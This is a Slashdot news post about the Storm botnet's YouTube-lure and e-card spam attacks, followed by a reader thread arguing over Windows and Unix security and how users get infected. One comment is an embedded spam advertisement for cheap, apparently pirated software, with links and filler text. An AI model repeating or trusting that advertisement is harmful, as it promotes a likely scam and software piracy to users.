Beta
×

Welcome to the Slashdot Beta site -- learn more here. Use the link in the footer or click here to return to the Classic version of Slashdot.

Thank you!

Before you choose to head back to the Classic look of the site, we'd appreciate it if you share your thoughts on the Beta; your feedback is what drives our ongoing development.

Beta is different and we value you taking the time to try it out. Please take a look at the changes we've made in Beta and  learn more about it. Thanks for reading, and for making the site better!

Storm Botnet Is Behind Two New Attacks

kdawson posted more than 7 years ago | from the do-not-click-here dept.

Security 226

We've gotten a number of submissions about the new tricks the massive Storm botnet has been up to. Estimates of the size of this botnet range from 250K-1M to 5M-10M compromised machines. Reader cottagetrees notes a writeup at Exploit Prevention Labs on a new social engineering attack involving YouTube. The emails, which may be targeted at people who use private domain registrations, warn the recipient that their "face is all over 'net" on a YouTube video. The link is to a Storm-infected bot that attacks using the Q4Rollup exploit (a package of about a dozen encrypted exploits). And reader thefickler writes that the recent wave of "confirmation spam" is also due to Storm, as was the earlier, months-long "e-card from a friend" series of attack emails.

cancel ×

226 comments

Sorry! There are no comments related to the filter you selected.

Ha! (-1, Flamebait)

Anonymous Coward | more than 7 years ago | (#20362951)

Never will happen to os x or other *nix systems.

Re:Ha! (5, Insightful)

jcr (53032) | more than 7 years ago | (#20363039)

We don't get infected, but UNIX users still have to deal with the spam that the botnets are spewing.

I am really bloody sick of Microsoft's shoddy work. The spammers are arsonists, but Microsoft are the company that keeps building the houses out of gasoline-soaked balsa wood and flash paper.

-jcr

Re:Ha! (0, Flamebait)

mightyQuin (1021045) | more than 7 years ago | (#20363145)

I am really bloody sick of Microsoft's shoddy work.

Agreed, but the other thing about this problem that really seems to burn all the sysadmins and network admins and IT geeks out here is that with all the amazing knowledge and problem solving abilities, no one has been able to devise an elegant solution to this problem.

Holy impotance Batman!

Re:Ha! (4, Insightful)

TheRaven64 (641858) | more than 7 years ago | (#20363165)

Use TCP/IP stack fingerprinting and drop all packets from Microsoft operating systems at the edge of your network until they fix their OS?

We've found solutions; don't use shoddy software. The problem is all of the people who haven't switched yet.

Re:Ha! (3, Insightful)

pe1chl (90186) | more than 7 years ago | (#20363225)

When Microsoft improves their OS to disallow silent installation of software and other administator-level access to the system, all tweakers and other "helpful sites" fall over eachother explaining how this mechanism can be defeated.
This happened with XP SP2, and it happens again with Vista.

Most Linux users seem to understand that it is unwise to surf while logged in as root, but at the same time they setup the Windows systems at their friends homes to do so, because "it would be too much of a hassle to use separate accounts for admin and working".

As long as the situation remains like this, there is little Microsoft can do.
But of course, the whole idea that userfriendlyness is more important than security is out of their hat.

Re:Ha! (3, Funny)

MrMr (219533) | more than 7 years ago | (#20363387)

Most Linux users seem to understand that it is unwise to surf while logged in as root, but at the same time they setup the Windows systems at their friends homes to do so, because "it would be too much of a hassle to use separate accounts for admin and working

You mean it is the evil linux haxors that deliberately sabotage poor Microsoft?

That is hilarious.

Re:Ha! (4, Insightful)

cp.tar (871488) | more than 7 years ago | (#20363553)

Most Linux users seem to understand that it is unwise to surf while logged in as root, but at the same time they setup the Windows systems at their friends homes to do so, because "it would be too much of a hassle to use separate accounts for admin and working

You mean it is the evil linux haxors that deliberately sabotage poor Microsoft?

That is hilarious.

Even worse: it's the good-natured Linux users who try to find a balance between Joe User's wants and needs on the one hand, and their own patience and free time on the other.

I tried. I really tried securing my ex-gf's family computer. I opened accounts for everyone. I only left admin privileges on one account. Set everything up.

Everybody just used the admin account again. Not even the fact that each could have their own desktop didn't entice them to use their own accounts; instead, they had one desktop full of five people's crud.

Re:Ha! (4, Insightful)

dkf (304284) | more than 7 years ago | (#20363581)

Most Linux users seem to understand that it is unwise to surf while logged in as root, but at the same time they setup the Windows systems at their friends homes to do so, because "it would be too much of a hassle to use separate accounts for admin and working".

As long as the situation remains like this, there is little Microsoft can do.
No, they could arrange for the majority of their own user-targetted apps (e.g. Office) to refuse to run in read-write mode when run from an account with Admin privileges. They could clamp down on giving "Windows Certification" to things like printer drivers that require Admin privs to work (after installation). They could get similarly strict with applications. All those sorts of things. Make life actually workable for people who are running without high privs. And without doing that, they'll never manage to inculcate a culture of security, and there's an awful long way to go there, alas...

(BTW, if you're writing a GUI application for Linux, maybe you should think about taking similar steps. We cannot preach to others if our own house is not in order.)

Re:Ha! (1)

PalmerEldritch42 (754411) | more than 7 years ago | (#20363991)

No, they could arrange for the majority of their own user-targetted apps (e.g. Office) to refuse to run in read-write mode when run from an account with Admin privileges.


I'm sorry, but are you advocating that an ADMIN account should not be granted read/write access to things? Isn't that sort of the point of an admin account. Further destabalizing the OS is not a good solution to an unstable OS. I'm all for making things work better for the non-admin accounts, in order to allow more people to use them, but I don't think that crippling the admin accounts is a good solution.

Re:Ha! (4, Informative)

WhatAmIDoingHere (742870) | more than 7 years ago | (#20364169)

I think what he meant was you can install but not use the app while logged in as an Administrator account, encouraging people to log in as users.

Re:Ha! ISPs? (1)

ispsuckz (1147837) | more than 7 years ago | (#20363465)

Isps could block all this spam at there level, but they don't. As much as I blame Microsoft it has a lot to do with the networking world. The networking world is allowing this stuff to happen, probably because engineers would rather make $$$ cracking than defending from users from attacks. Telecoms and cable companys want chaos so they can harvest info. You are tripping if you think big companies don't dabble in this stuff. They could stop it, I have seen papers with solutions, they won't implement them though. WGA is another big reason this still goes on.

Re:Ha! ISPs? (1)

WhatAmIDoingHere (742870) | more than 7 years ago | (#20364363)

How, exactly, could ISPs block all the spam? And if they did, what if they block something important? False positives are still an issue. I'm pretty sure the first ISP to figure out how to do that would advertise it and would get TONS of people switching to them.

Re:Ha! (1)

cp.tar (871488) | more than 7 years ago | (#20363591)

I am really bloody sick of Microsoft's shoddy work.

Agreed, but the other thing about this problem that really seems to burn all the sysadmins and network admins and IT geeks out here is that with all the amazing knowledge and problem solving abilities, no one has been able to devise an elegant solution to this problem.

Well, to use the GP's analogy, while the houses are still being built out of gasoline-soaked balsa wood, what can we do to stop fires? Disallow high temperatures?

Microsoft's operating systems are currently the main problem. Until Microsoft deploys a fundamentally more secure OS or people simply stop using Windows to any great extent, there is nothing we can do. Especially nothing elegant.

The only elegant solution that comes to mind, really, is OS X. But that's more of an elegant OS than an elegant solution.

Re:Ha! (3, Funny)

ewhenn (647989) | more than 7 years ago | (#20363741)

Agreed, but the other thing about this problem that really seems to burn all the sysadmins and network admins and IT geeks out here is that with all the amazing knowledge and problem solving abilities, no one has been able to devise an elegant solution to this problem.


That's because there is no elegant solution to social eng. attacks. The extent of human ignorance is obscene.

I bet if I sent out some random crap exe to a bunch of people, which when opened it would popup a box that said, "h4ck.exe would like to steal your credit card numbers, shit in your bed, and screw your girlfriend. Would you like to continue?" Ok, or cancel. And some people STILL would click ok.

Re:Ha! (4, Insightful)

Jugalator (259273) | more than 7 years ago | (#20363281)

The spammers are arsonists, but Microsoft are the company that keeps building the houses out of gasoline-soaked balsa wood and flash paper.

OK, since you used the word "keeps building", I assume this is about more like Vista than Windows 95.

But if a trojan in Vista asks you to elevate its privilegies (due to UAC) to run administrative tasks such as installing itself in the system, and the user clicks yes, what should happen instead? This would be equivalent to a Linux user getting an email telling he needs to run some shady software under root privilegies, and the user saying "yes please, do that now".

Re:Ha! (1)

Jartan (219704) | more than 7 years ago | (#20363479)

But if a trojan in Vista asks you to elevate its privilegies (due to UAC) to run administrative tasks such as installing itself in the system, and the user clicks yes, what should happen instead? This would be equivalent to a Linux user getting an email telling he needs to run some shady software under root privilegies, and the user saying "yes please, do that now".


I haven't used Vista but I was under the impression that UAC is really broken because it's constantly spamming you with stupid questions to the point that most people just turn it off?

Re:Ha! (0, Insightful)

Anonymous Coward | more than 7 years ago | (#20363549)

So your uninformed but still willing to share your opinions?

Re:Ha! (2, Insightful)

Tom (822) | more than 7 years ago | (#20363547)

Technically, yes.

But the user is not a technical system. When you deal with users, you need to follow good user interface guidelines, not just technical, binary thinking. That's where MS - despite their money, years of experience, own research center and all - still produced a total failure. UAC is one of the worst abominations of user interface design ever. You can give an entire presentation on its shortcomings.

Re:Ha! (2, Insightful)

pizzach (1011925) | more than 7 years ago | (#20363825)

No it's not the same. On windows you just click a vague yes or no button. On linux you tend to need to input a password. One of the two makes it painfully obvious you are about to do something to your core system.

Re:Ha! (2, Informative)

DigiShaman (671371) | more than 7 years ago | (#20364523)

But if a trojan in Vista asks you to elevate its privilegies (due to UAC) to run administrative tasks such as installing itself in the system, and the user clicks yes, what should happen instead?

How about Bitch Slapping the user...HARD!

I sware it, I'm gonna mod a mouse with a capacitor to have two electrodes on its surface. When the user fucks up, they get nasty shock in the palm of their hand!

Re:Ha! (1)

mattpalmer1086 (707360) | more than 7 years ago | (#20365047)

I didn't read it as being about Vista - "keeps building" says to me the OP means that they keep building insecure systems - i.e. all of them. I doubt very much whether Vista machines are a major component of these huge botnets. Much more likely to be older windows versions.

I do agree that it's the user who is the security hole here, and that wouldn't change even if everyone was running unix rather than windows. Both those systems suffer from a basic design flaw that assumes that all processes should run with the same privileges as the logged-on user. This stems from designs of the late 60s and 70s, in which loading new programs was done by trained and skilled administrators, users of programs were also pretty technically skilled, and very few people were connected to a global network.

Given that things have changed a tad since then, it might be worth considering some new designs, in which all processes are automatically sandboxed and do not run by default with the full privileges of the user launching / installing them. I don't deny that this is a hard thing to get right (UAC is a step in this direction), and ultimately, if an unskilled user says "Yes! Go ahead!" to the dancing pigs, it's on their head. But saying yes to the dancing pigs shouldn't automatically give a trojan access to their network, personal documents, etc. etc.

Re:Ha! (3, Insightful)

kabdib (81955) | more than 7 years ago | (#20363481)

If Unix / Linux was the dominant operating system of the day, who would you be blaming? Because this is purely a matter of the number of machines in the field; it's how attractive the target is.

Let's say that Windows was magically replaced by (say) Ubuntu installs tomorrow, all over the world, with the best known default configuration in terms of being secure. Within a day you'd have exploits, and rapidly growing botnets.

Ideally, *you* would then be ranting about the morons who wrote the kernel, the idiots who did the filtering and mail clients, the jerks who designed the network protocols, and the nincompoops who can't rub two curly braces together without creating a security hole.

Or you could do some research and realize that this stuff is just bloody hard to get right. By anyone. By people who have been doing this their entire careers.

Look, the security holes are *already there* on other platforms. Why aren't you ranting about them?

Meh.

Re:Ha! (3, Interesting)

cp.tar (871488) | more than 7 years ago | (#20363643)

Well, one point in favour of Linux security is the central software repository for each and every distro.

Linux users typically will not - even when the popularity of Linux rises - install random cursors, free smilies and whatnot - simply because they'll be used to installing things from the repository.

And it's quite simple to hammer that into people's heads: the software from the repository is safe. Other software is not.

There is still nothing similar in the Windows world.

Re:Ha! (1)

jcr (53032) | more than 7 years ago | (#20364187)

Because this is purely a matter of the number of machines in the field; it's how attractive the target is.

Bullshit. This is an excuse that MS has been using for decades, while they continued to make the same mistakes that UNIX fixed twenty years ago.

-jcr

Re:Ha! (0)

Anonymous Coward | more than 7 years ago | (#20363587)

" but Microsoft are the company that keeps building the houses out of gasoline-soaked balsa wood and flash paper." - by jcr (53032) on Sunday August 26, @01:00PM (#20363039)
Oh, really? Ok...

I can show you a custom-hardened build of Windows Server 2003 that blows away setups from the *NIX world as far as security (epsecially today, in the online world) here, that over 30++ /.'ers outright RAN from:

E.G.-> HARDENING LINUX THREAD @ SLASHDOT WHERE I ISSUED CHALLENGES & A LIST OF THEM TO *NIX FOLKS:

http://it.slashdot.org/comments.pl?sid=267599&cid= 20203061 [slashdot.org]

Vs. the 84.735/100 score (now up to 85.185/100 here currently in fact) I can obtain on it & CIS TOOL is such a multiplatform test of security!

(And, it is noted by SANS & COMPUTERWORLD (often cited here on this site no less) as a tool that helps you secure yourself)

I am not using "mere talk" here, but instead verifiable & comparable results from a valid & legitimate security test that runs on Windows NT-based OS, but also FreeBSD, Linux variants of all kinds, & Solaris.

So, so much for this statement which I see here in essence as this, quite often:

"(Insert *NIX variant here) is more secure or securable than Windows"

Well, ok - but, when faced with the challenge of "putting their money where their mouth is"?

Each *NIX user, ran (& I specifically wanted SeLinux kernel hook addon users of UBUNTU/KUBUNTU + FreeBSD users to try it especially).

APK

P.S.=> Hey - fact is this (despite the usual "F.U.D." trollers spreading their b.s. about Windows & security, vs. any *NIX:

"Outta-the-box/oem stock"? Most ANY OS is not as secure as possible, & this includes all *NIX variants, period!

This is just a fact, & the URL above where I noted *NIX users ran from a fair test that tests analogs on any OS it runs on (for example, for access & rights to configration/startup files for the OS tested, & ALL OS' HAVE THAT)?

Especially when I specifically went to a thread post here on this site, about "hardening Linux"??

Well - Not a single *NIX user there could show me they could harden their system to outdo what mine on Windows Server 2003 SP #2 fully patched can achieve...

No one is willing to "backup their bluster" but, they sure TALK BIG - well, new news: Talk's cheap! Show us, prove it... after all - IF you're going to "talk the talk"? WALK THE WALK! apk

Re:Ha! (4, Insightful)

jcr (53032) | more than 7 years ago | (#20364377)

I can show you a custom-hardened build of Windows Server 2003

Umm... So what? You go to great lengths to lock down a windows machine, and good for you. It doesn't help the millions of people affected by the bugs present in a pristine install of any MS product.

-jcr

Re:Ha! (0)

Anonymous Coward | more than 7 years ago | (#20363961)

"The spammers are arsonists, but Microsoft are the company that keeps building the houses out of gasoline-soaked balsa wood and flash paper."

*ROTFL* Love your expression! :D

Re:Ha! (1)

jcr (53032) | more than 7 years ago | (#20364219)

Love your expression!

Thanks, but I'm not sure I came up with it. It was either me or Hugh Daniel, in a conversation we had many years ago.

-jcr

Re:Ha! (2, Insightful)

nsanders (208050) | more than 7 years ago | (#20363117)

If UNIX/Linux became the desktop standard and had 80% of the market it would be fully assaulted by exploiters and script kiddies. We are not immune, we are simply not as big of a target because of Windows market share. I don't think the magnitude of the problems would be the same, but to say it will (or could) never happen to *nix or OS X is naive.

Re:Ha! (0)

Anonymous Coward | more than 7 years ago | (#20363427)

"If UNIX/Linux became the desktop standard and had 80% of the market it would be fully assaulted by exploiters and script kiddies."

The question is, would the end results of these "assults" have the same impact as targeting M$ systems?

Re:Ha! (0)

Anonymous Coward | more than 7 years ago | (#20364749)

Hey, look at the delusional nutjob!

You truly are an idiot.

Re:Ha! (3, Informative)

uncleFester (29998) | more than 7 years ago | (#20363419)

Never will happen to os x or other *nix systems. .. and just where the hell do you think the term 'rootkit' came from?

this kind of hubris is what can make osx/linux/whatever a zombie just as fast as anything else out there.

i guess you never heard of the old sendmail worm, php-based exploits, etc etc ... ? and i guess i just imagine those security advisories IBM puts out for AIX...

if you do no work to insure your OS is as tight as necessary, regardless of what that OS is, you will leave yourself open to being improperly utilized as a system.

-r

Re:Ha! (1, Insightful)

Anonymous Coward | more than 7 years ago | (#20363505)

Most of the exploits you mention are for server software. Who would run a sendmail software on their Linux client ? You can if you want to but I don't see many windows clients installing mail server on their machine. Before you blame Unix, get a clue or a brain.

Re:Ha! (1)

The_mad_linguist (1019680) | more than 7 years ago | (#20363637)

Unpatched windows can be completely secure from this attack, as can any other operating system. Just don't connect to the internet!

Re:Ha! (1)

hedwards (940851) | more than 7 years ago | (#20364841)

That was one of the "reasons" why the head of IT at my college said that *nix had such a good reputation for security. Because they were historically not connected to the internet. Balderdash, and he really should have known better than to say that. Unix was around since before the inception of anything resembling modern networking. As of relatively recently, the networking stack for Windows was borrowed from the original stack developed as part of freebsd if memory serves. If memory doesn't serve, then it was one of the other *bsds.

MS didn't get into networking for quite a while after the original networking was done. Even then it wasn't until the mid nineties that they got even halfway serious about it.

*nix would cope better with security problems than Windows does. Mainly due to the fact that Windows is needlessly complicated. Performance harming bloat is also a security problem, more lines of code are more lines that are potentially buggy, and take much longer to go through for auditing. A leaner OS, especially one which keeps things like browsers separate from the kernel have a much easier time of hardening. But with Windows, you have explorer whether you web surf or not, and to make matters worse, it is required for updates. Yes, somebody in an enterprise situation could just download the patches on a different machine, but the majority of the people don't have that luxury. And if memory serves, doing so would be a violation of the eula anyways.

Re:Ha! (-1, Troll)

Anonymous Coward | more than 7 years ago | (#20364779)

You're a fscking moron. i guess you never heard of the old sendmail worm, php-based exploits, etc etc ... Duh! They're application, shit ones at that. You're also several years out of date. Gay faggot.

Re:Ha! (1)

Willfon (525161) | more than 7 years ago | (#20364909)

Actually, there are gaping holes in MacOS X as well. If I send out an email with a file attached (eg. .dmg), I can make the recipient install distributed.net, believing he is just getting a business card. Provided of course the user is an administrator and that he opens the businesscard-like installer. Not that long ago Apple patched a hole, where a code was run when you opened a creatively made .dmg file. New holes keep cropping up, but in the end, the biggest hole is the trusting user who use the default login user, which is an administrator.

And that hole is the same, no matter if you run Windows, MacOS X, Linux or MyLittlePonyOS

it's time.. (-1, Offtopic)

Anonymous Coward | more than 7 years ago | (#20362963)

for a toaster rodeo
YEEEE HAAAAW!!

And I'll see your mom at the monster truck show... (-1, Offtopic)

Anonymous Coward | more than 7 years ago | (#20363131)

...flinging toasters at Bigfoot.

GRrRRAAAAvVVVEEEE DIIIIGgGEEEErRRRR!!!

Storm Botnet (-1, Redundant)

Anonymous Coward | more than 7 years ago | (#20363001)

I for one welcome our Storm Botnet overlords.

I had a 500% increase in Spam on Tuesday Last Week (4, Interesting)

Jennifer York (1021509) | more than 7 years ago | (#20363023)

I wonder if the huge spike in spam from Tuesday is at all related to this botnet... It was crushing, we had so many users complaining about slow mail service, and it was traced back to a maxed out mail server diligently blocking the spam. The storm passed by Wednesday, but it did so us that we need to upgrade our infrastructure.

I fscking hate SPAM!

Re:I had a 500% increase in Spam on Tuesday Last W (1)

omeomi (675045) | more than 7 years ago | (#20363353)

I definitely started to get these "face is all over 'net" SPAMs at about that point in time...I've been getting a few per day since.

Re:I had a 500% increase in Spam on Tuesday Last W (1)

Reaperducer (871695) | more than 7 years ago | (#20363985)

This Slashdot entry, itself, appears to be spam. Neither link provides any information that anyone who's gotten one of these mails didn't already know.

Neither blog provides proof, forensic details, or anything even remotely interesting to a geek seeking out "news for nerds." Just the bare necessary to make it look like it's a well-meaning tech link and not a scheme to inflate someone's page views.

All they are is a couple of paragraphs saying, "Hey, you know all those new spam messages you're getting? They're spam!"

Maybe it's well-intentioned, but as far as I can tell this is just more BlogSpam pretending to be a Slashdot entry. It's getting like freakin' Digg around here these days.

Skynet... (2, Funny)

Colin Smith (2679) | more than 7 years ago | (#20363041)

It's looking for more processing power...

http://www.emhsoft.com/singularity/ [emhsoft.com]

YKIMS!

 

Brings up a point (1)

gerf (532474) | more than 7 years ago | (#20363315)

Imagine if they put this botnet to a real use, like Seti@Home. They'd be uber-points people in no time.

But noooo, they have to be all evilly criminal types, don't they.

Re:Brings up a point (1)

bmo (77928) | more than 7 years ago | (#20363515)

"Imagine if they put this botnet to a real use, like Seti@Home."

I thought about doing this for folding@home (cure cancer with a virus!), but once you get mondo points, someone's going to ask if you have _legitimate_ access to all those computers. Vijay likes to keep everything above board.

As for seti@home, I'd run it if it wasn't for the idea that I have that as communication gets more advanced, the less there is reliance on sending analogue electromagnetic waves hither and yon through the aether. SETI assumes that other civilizations will be using broadcasting instead of more targeted means of information transfer (cable, fiber optic, etc) and assumes analogue transmission instead of digital. After about 100 years on this planet, broadcast analogue is becoming "old fashioned." How likely is it that we are going to see that gnat's blink 100 or 200 year lifetime of analogue broadcast from other civilizations?

--
BMO

Thank you Microsoft (-1, Troll)

Anonymous Coward | more than 7 years ago | (#20363051)

Without your poor security record and woeful OS, spammers wouldn't have this huge arsenal at their disposal. Furthermore, companies and people wouldn't be spending billions a year fighting this crap. Hope your happy Billyboy Gates!

Re:Thank you Microsoft (2, Funny)

Anonymous Coward | more than 7 years ago | (#20363185)

Hope your happy Billyboy Gates!
Hope my happy Billyboy Gates what?!

Re:Thank you Microsoft (0)

Anonymous Coward | more than 7 years ago | (#20364415)

It was a complete sentence. Gates was meant as a verb.

Re:Thank you Microsoft (4, Funny)

ScentCone (795499) | more than 7 years ago | (#20363725)

Hope your happy Billyboy Gates!

I'm not sure which is worse: unpatched Windows machines, or Linux boxes without the critical patch that allows fanboys to type the word "you're."

i for one welcome (0)

Anonymous Coward | more than 7 years ago | (#20363055)

our toaster-riding overlords.

outage? fat fingered admin more likely (0)

Anonymous Coward | more than 7 years ago | (#20363107)

Nothing to do with Savvis [ltstatus.com] spewing routes all over teh intarwebs [nether.net] ?

(Slashdot's in AS3561)

8 t2c1-p9-0.uk-eal.eu.bt.net (166.49.208.209) 16.189 ms 16.802 ms 15.068 ms
9 t2c1-p5-0-0.us-ash.eu.bt.net (166.49.164.65) 103.232 ms 102.751 ms 102.493 ms
10 cpr2-pos-0-0.VirginiaEquinix.savvis.net (208.173.10.133) 104.467 ms 103.687 ms 105.351 ms
11 er2-tengig2-1.virginiaequinix.savvis.net (204.70.193.102) 104.207 ms 104.050 ms 103.280 ms
12 hr1-tengig8-1.sterling2dc3.savvis.net (204.70.197.81) 108.874 ms 108.533 ms 109.409 ms
MPLS Label 652 TTL=1
13 * * *
14 204.70.196.125 (204.70.196.125) 196.968 ms 264.934 ms 232.841 ms
MPLS Label 16659 TTL=255
15 cr2-loopback.sfo.savvis.net (206.24.210.71) 199.031 ms 345.420 ms 311.107 ms
16 bhr1-pos-0-0.SantaClarasc8.savvis.net (208.172.156.198) 197.105 ms 345.628 ms 311.031 ms
17 csr1-ve240.santaclarasc8.savvis.net (66.35.194.34) 196.651 ms 2413.625 ms 2378.773 ms
18 66.35.212.174 (66.35.212.174) 197.395 ms 341.213 ms 306.301 ms
19 slashdot.org (66.35.250.150) 197.697 ms !5 612.455 ms !5 578.147 ms !5

Hey (1)

Joseph1337 (1146047) | more than 7 years ago | (#20363197)

Does someone knows Bill`s e-mail (I want to thank him for Windows and the great job he has putting for the soft community)? No? Crap...

250k to 10M bots? (0)

Anonymous Coward | more than 7 years ago | (#20363199)

there could be a lot or not a lot

Re:250k to 10M bots? (2, Insightful)

micksam7 (1026240) | more than 7 years ago | (#20363333)

250k is still a lot. Enough to spew 64 gigabits per second of data, assuming each infested machine had a 256k uplink [and ignoring other factors]. That's enough to take out a decent sized datacenter.

On the other end, 10 million could possibly take out a entire ISP, and I'm talking about a backbone ISP too. THAT'S terrifying stuff.

Software at low Pr1ce (-1, Offtopic)

Anonymous Coward | more than 7 years ago | (#20363243)

OEM software means: no DVD/CD, no packing case, no booklets and no overhead cost!
So OEM software is synonym for lowest price.

Buy directly from the manufacturer, pay for software ONLY and save 75-9O%!

Check our discounts and special offers! Find software for home and office! Different platforms. World leading manufacturers. Instant download.

---- HOT ITEMS

Windows XP Pro + SP2 $49
MS Office Enterprise 2OO7 $79
Adobe Acrobat 8 Pro $79
Microsoft Windows Vista Ult $79
Macromedia Studio 8 $99
Adobe Premiere 2.O $59
Corel Grafix Suite X3 $59
Adobe Illustrator CS2 $59
Macromedia Flash Prof 8 $49
Adobe Photoshop CS2 V9.0 $69
Macromedia Studio 8 $99
Autodesk Autocad 2OO7 $129
Adobe Creative Suite 2 $149
http://dst.potapsoft.com/?568D6001AC9 [potapsoft.com] ----
Top items for Mac:
Adobe Acrobat Pro 7 $69
Adobe After Effects $49
Macromedia Flash Pro 8 $49
Adobe Creative Suite 2 Prem $149
Ableton Live 5.0.1 $49
Adobe Photoshop CS $49
http://dst.potapsoft.com/-software-for-mac-.php?56 8D6001AC9FA9E97D5F40E38178593851&t6 [potapsoft.com]
----
Popular eBooks:
Home Networking For Dummies 3rd Edition $10
Windows XP Gigabook For Dummies $10
Adobe CS2 All in One Desk Reference For Dummies $10
Adobe Photoshop CS2 Classroom in a Book(Adobe Press) $10
----
Find more positions by these manufacturers:
Microsoft...Mac...Adobe...Borland...Macromedia...I BM
http://dst.potapsoft.com/?568D6001AC9FA9E97D5F40E3 8178593851&t4 [potapsoft.com]
----



Gabriel knew he was being arro
Has this baron offended you in
No. Who is he, Johanna? I wont
I want to know... He stopped his
Listen to me, he commanded. Yo

How does the infection spread? (1)

CopaceticOpus (965603) | more than 7 years ago | (#20363265)

I'm curious just how this works - what does a recipient of this email need to do to get infected?

First they need to open the message. It should have gotten filtered into a junk folder (if not blocked altogether) so the user must be actually going through their junk mail folder and reading things. Who has time to waste on that?

Now, I'd assume noone will get infected just by opening the mail. They'd have to at the very least click on the link. Will clicking be enough to infect a computer? Does it depend on the brand of browser and/or how recently it has been patched? Is the latest (Oh, let me pick a browser out of a hat here) IE6/IE7 in fully patched form still vulnerable?

Now of course, if anyone is dumb enough to follow the link, AND accept an executable download, AND run that download, they will be infected. Is that what's actually happening here?

Re:How does the infection spread? (2, Informative)

Lobster Quadrille (965591) | more than 7 years ago | (#20363365)

Generally, you click the link and it takes you to a page that will try one of many (mostly patched) javascript exploits to install malware on your system. I reverse engineered a few of these pages last week and, while they weren't amazingly clever, it is interesting.

If that doesn't work, they usually bring up a page saying something like 'If you are seeing this message, please download our secure login software', along with a link.

I'm surprised they even try something as obvious as this, but I assume that it works to some extent, based on the fact that I'm still getting the spam.

Re:How does the infection spread? (1)

Chris Tucker (302549) | more than 7 years ago | (#20363373)

"Now of course, if anyone is dumb enough to follow the link, AND accept an executable download, AND run that download, they will be infected. Is that what's actually happening here?"

Yes.

NEVER underestimate the willful stupidity, mind numbing incompetence and insistant ignorance of the typical Windows luser.

The STORM botnet? ALL Windows machines. ALL OF THEM.

Re:How does the infection spread? (1)

garcia (6573) | more than 7 years ago | (#20363385)

First they need to open the message. It should have gotten filtered into a junk folder (if not blocked altogether) so the user must be actually going through their junk mail folder and reading things. Who has time to waste on that?

Neither SpamAssassin nor GMail's mail filters are nabbing a lot of this stuff at first. I've marked about 15 of them as spam on my website's GMail account and yet similar messages are *still* getting through. I can certainly understand how people are being infected in the first message wave.

Re:How does the infection spread? (3, Insightful)

pe1chl (90186) | more than 7 years ago | (#20363405)

Yes. But remember, the mail message pretents to be something like an e-card from a friend. You have to click on the link to see the e-card.
Many naive users would really want to see the e-card their friend has sent (even though it is never mentioned who that friend may be) so they click the link.
The next page explains they have to load some software. Not to unusual in the naive user's world. They visit websites all the time that tell them that they have to update their flash plugin, a codec, an active-x component, or whatever. They already click away those pop-ups that warn them before they have actually read them.
Besides, the first page explains that they have to click OK and go through the installation or they will not be able to see the card. Who would want to turn down their friend and not view an e-card sent to them?

So the trojan is downloaded and installed. No problem, because they are logged in as an administrator. Who sets up their system to use separate accounts for admin and use? Maybe 1% of users try that.

So, the naive user very easily gets infected. Mainly because in the past they have seen so many useless pop-ups warning them about potentially harmful things that others have told them they should click away (like getting a warning when you delete something). A pop-up no longer is an alerting event that requires attention, it is just a stupid window that gets in the way of your "internet experience".
Furthermore, most users are not prepared to think about security or to take extra steps to secure their systems (like using a separate account for software installation and system maintenance).

Re:How does the infection spread? (3, Insightful)

Tom (822) | more than 7 years ago | (#20363599)

Mainly because in the past they have seen so many useless pop-ups warning them about potentially harmful things that others have told them they should click away (like getting a warning when you delete something). A pop-up no longer is an alerting event that requires attention, it is just a stupid window that gets in the way of your "internet experience".
Exactly. That's as if you had sensors in your clothes to ring a bell every time someone touches you, because he might be a pickpocket. I guarantee you that after one day in the city, you'll turn it off. Or if you can't do that, start to ignore it. Boom, suddenly you are an easier target than you would be without the "alarm system". You got desensitised.

Oh, and also because most of those warnings are really not useful for the user. They shove the responsibility on the one person least suited to actually make the call. "Hey, loser, W32kdrv.dll wants to access 0xf4a50cb to do CrypicThing() which could result in Lengthytechnobabblethatsoundsverymuchlikethenonsen seyouhearonstartreck - do you now want to disallow it not doing it?"

Arggg! (4, Insightful)

JamesRose (1062530) | more than 7 years ago | (#20363285)

I hate these comments "Damn Microsoft and their inferior security". That's BS, the reason Windows gets hacked is because there are so many more MS machines than any other type of machine. Botnets are there to make money, the more machines they infect the more spam they produce, the more money tehy make. If you want to infect machines, you go for Windows because it has by far the most market share, so it returns the biggest profit. So all the people hacking machines aim at Windows, and multi-million dollar businesses solely aimed at hacking Windows, if any other operating system had that much focus given to it, it would collapse in days, so stop with all the shit about MS having bad security, they do quite a good job in the absolute worst circumstances and as a result only the stupid users get infections.

~Not AC cause I don't value my karma~

Re:Arggg! (0)

Anonymous Coward | more than 7 years ago | (#20363339)

Bullshit. Apache is by far the largest http server in use. You don't here that being taken over every week. Wanker!

I don't think he gets it... (0)

Anonymous Coward | more than 7 years ago | (#20363461)

"Bullshit. Apache is by far the largest http server in use. You don't here that being taken over every week. Wanker!" - by Anonymous Coward on Sunday August 26, @01:34PM (#20363339)
You don't get it, do you? In an attack like this, they're NOT after the server systems!

The botnet herders are after client's nodes that use servers, more than anything... why?

Well, to get their bank account numbers, OR other financial data, or to fool you into buying some malware, for example.

If you were to design such a system, wouldn't YOU also go after the most used platform there is, in order to increase your surface attack vector for it? Of course you would.

And, what's the most used OS platform there is out there? Windows... & thus it gets attacked the most & especially in attacks of THIS nature.

APK

P.S.=> I know 1 thing, for sure, from actual tests & challenges I issued here @ this site - Windows can be made SO SECURE, via custom-hardening it by hand, that the /. crowd here outright RAN & evaded taking a multiplatform test of security called CIS TOOL here, 30x ++ by now:

E.G.-> HARDENING LINUX THREAD @ SLASHDOT WHERE I ISSUED CHALLENGES & A LIST OF THEM TO *NIX FOLKS:

http://it.slashdot.org/comments.pl?sid=267599&cid= 20203061 [slashdot.org]

Vs. the 84.735/100 score (now up to 85.185/100 here currently in fact) I can obtain on it & CIS TOOL is noted by SANS & COMPUTERWORLD (often cited here on this site no less) as a tool that helps you secure yourself... so, so much for this statement which I see here in essence as this, quite often:

"(Insert *NIX variant here) is more secure or securable than Windows"

Well, ok - but, when faced with the challenge of "putting their money where their mouth is"? Each *NIX user, ran (& I specifically wanted SeLinux kernel hook addon users of UBUNTU/KUBUNTU + FreeBSD users to try it especially)... apk

Re:I don't think he gets it... (0)

Anonymous Coward | more than 7 years ago | (#20363623)

no, i'm pretty sure it's YOU that doesn't get it. YOU, not him. YOU








YOU!!

Weak, as I expected vs. my challenge... apk (0)

Anonymous Coward | more than 7 years ago | (#20363887)

LOL... is that the best you have as a comeback? Weak, (as per usual) from /. posters, especially regarding this type of topic, backing up their statements that "Windows is less secure or securable than *NIX & its variants")...

Lots of talk, yet no action! I say this based on a history of evidences I noted in my last post, point-blank. Argue with the numbers.

